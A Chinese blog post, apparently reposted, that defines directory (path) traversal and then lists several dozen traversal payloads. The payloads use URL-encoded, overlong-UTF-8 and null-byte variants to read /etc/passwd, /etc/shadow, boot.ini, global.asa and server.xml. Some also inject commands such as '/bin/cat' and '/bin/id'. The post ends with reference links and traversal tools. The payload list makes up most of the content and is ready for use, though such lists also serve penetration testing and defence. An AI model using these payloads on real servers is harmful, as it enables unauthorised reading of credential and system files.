目录遍历以及特殊字符

转自 xxx.com

============================

基本定义:
    目录遍历(或路径遍历)(directory traversal/path traversal)是由于Web服务器或Web应用程序对用户输入文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过HTTP请求和利用一些特殊字符就可以绕过服务器的安全限制,访问任意受限的文件(可以是Web根目录以外的文件),甚至执行系统命令。

可能导致路径遍历一些特殊字符:

  • ..
  • ..\
  • ../
  • %2e%2e%2f which translates to ../
  • %2e%2e/ which translates to ../
  • ..%2f which translates to ../
  • %2e%2e%5c which translates to ..\
  • %c1%1c
  • %c0%9v
  • %c0%af
  • ..%5c../
  • ../../../../../../../../../../../../etc/hosts%00
  • ../../../../../../../../../../../../etc/hosts
  • ../../boot.ini
  • /../../../../../../../../%2A
  • ../../../../../../../../../../../../etc/passwd%00
  • ../../../../../../../../../../../../etc/passwd
  • ../../../../../../../../../../../../etc/shadow%00
  • ../../../../../../../../../../../../etc/shadow
  • /../../../../../../../../../../etc/passwd^^
  • /../../../../../../../../../../etc/shadow^^
  • /../../../../../../../../../../etc/passwd
  • /../../../../../../../../../../etc/shadow
  • /./././././././././././etc/passwd
  • /./././././././././././etc/shadow
  • \..\..\..\..\..\..\..\..\..\..\etc\passwd
  • \..\..\..\..\..\..\..\..\..\..\etc\shadow
  • ..\..\..\..\..\..\..\..\..\..\etc\passwd
  • ..\..\..\..\..\..\..\..\..\..\etc\shadow
  • /..\../..\../..\../..\../..\../..\../etc/passwd
  • /..\../..\../..\../..\../..\../..\../etc/shadow
  • .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  • .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
  • \..\..\..\..\..\..\..\..\..\..\etc\passwd%00
  • \..\..\..\..\..\..\..\..\..\..\etc\shadow%00
  • ..\..\..\..\..\..\..\..\..\..\etc\passwd%00
  • ..\..\..\..\..\..\..\..\..\..\etc\shadow%00
  • %0a/bin/cat%20/etc/passwd
  • %0a/bin/cat%20/etc/shadow
  • %00/etc/passwd%00
  • %00/etc/shadow%00
  • %00../../../../../../etc/passwd
  • %00../../../../../../etc/shadow
  • /../../../../../../../../../../../etc/passwd%00.jpg
  • /../../../../../../../../../../../etc/passwd%00.html
  • /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
  • /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
  • /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  • /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
  • %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
  • /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
  • %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
  • %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
  • /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
  • \\'/bin/cat%20/etc/passwd\\'
  • \\'/bin/cat%20/etc/shadow\\'
  • ../../../../../../../../conf/server.xml
  • /../../../../../../../../bin/id|
  • C:/inetpub/wwwroot/global.asa
  • C:\inetpub\wwwroot\global.asa
  • C:/boot.ini
  • C:\boot.ini
  • ../../../../../../../../../../../../localstart.asp%00
  • ../../../../../../../../../../../../localstart.asp
  • ../../../../../../../../../../../../boot.ini%00
  • ../../../../../../../../../../../../boot.ini
  • /./././././././././././boot.ini
  • /../../../../../../../../../../../boot.ini%00
  • /../../../../../../../../../../../boot.ini
  • /..\../..\../..\../..\../..\../..\../boot.ini
  • /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
  • \..\..\..\..\..\..\..\..\..\..\boot.ini
  • ..\..\..\..\..\..\..\..\..\..\boot.ini%00
  • ..\..\..\..\..\..\..\..\..\..\boot.ini
  • /../../../../../../../../../../../boot.ini%00.html
  • /../../../../../../../../../../../boot.ini%00.jpg
  • /.../.../.../.../.../
  • ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
  • /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini

相关文章:

  • 维基百科关于目录遍历的文章 >> http://en.wikipedia.org/wiki/Directory_traversal
  • Directory Traversal Attacks >> http://www.acunetix.com/websitesecurity/directory-traversal.htm
  • Testing for Directory Traversal - OWASP >> http://www.owasp.org/index.php/Testing_for_Path_Traversal


目录/路径遍历工具:

  • String searcher "grep" - The grep command searches one or more input files for lines containing a match to a specified pattern.
  • IIS Lockdown Tool - To provide in-depth defense or multiple layers of protection against an attacker, URLscan, with customized templates for each supported server role, has been integrated into the IIS Lockdown Tool.
  • evilarc.py - Create archive containing a file with directory traversal.
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值